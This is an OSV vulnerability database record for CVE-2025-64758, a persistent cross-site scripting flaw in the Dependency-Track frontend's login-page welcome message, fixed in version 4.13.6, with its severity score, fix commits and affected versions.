CVE-2025-64758

See a problem?
Please try reporting it to the source first.

Source

https://cve.org/CVERecord?id=CVE-2025-64758

Import Source

https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-64758.json

JSON Data

https://api.osv.dev/v1/vulns/CVE-2025-64758

Aliases

GHSA-7xvh-c266-cfr5

Published

2025-11-17T17:24:27.491Z

Modified

2026-04-02T13:01:05.623887Z

Severity

4.8 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N CVSS Calculator

Summary

@dependencytrack/frontend Vulnerable to Persistent Cross-Site-Scripting via Welcome Message

Details

@dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEMCONFIGURATION permission can configure a "welcome message", which is HTML that is to be rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize the HTML, allowing arbitrary JavaScript to be executed. Users with the SYSTEMCONFIGURATION permission (i.e., administrators), can exploit this weakness to execute arbitrary JavaScript for users browsing to the login page. The issue has been fixed in version 4.13.6.

Database specific

{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/64xxx/CVE-2025-64758.json",
    "cna_assigner": "GitHub_M",
    "cwe_ids": [
        "CWE-79"
    ]
}

References

Affected packages

Git / github.com/DependencyTrack/frontend

Affected ranges

Type

GIT

Repo

https://github.com/DependencyTrack/frontend

Events

Introduced

Fixed

74eee4a5153fd597c077f92ebdac03b8d195fd22

Database specific

{
    "versions": [
        {
            "introduced": "0"
        },
        {
            "fixed": "4.13.6"
        }
    ]
}

Type: GIT
Repo: https://github.com/dependencytrack/frontend
Events: Introduced

0 Unknown introduced commit / All previous commits are affected

Fixed

8fd757be612eaf4f35eadbe4c334204d7bd711be

Affected versions

1.*

1.0.0

1.0.0-rc.1

1.1.0

1.2.0

4.*

4.10.0

4.11.0

4.11.1

4.11.2

4.11.3

4.11.4

4.11.5

4.11.6

4.11.7

4.12.0

4.12.1

4.12.2

4.12.3

4.12.4

4.12.5

4.12.6

4.12.7

4.13.0

4.13.1

4.13.2

4.13.3

4.13.4

4.13.5

4.13.6

4.14.0

4.2.0

4.3.0

4.3.1

4.4.0

4.5.0

4.5.1

4.6.0

4.6.1

4.7.0

4.7.1

4.8.0

4.8.1

4.9.0

4.9.1

v1.*

v1.0.0-rc.1

v1.1.0

v1.2.0

v4.*

v4.2.0

v4.5.0

v4.5.1

Database specific

source

"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-64758.json"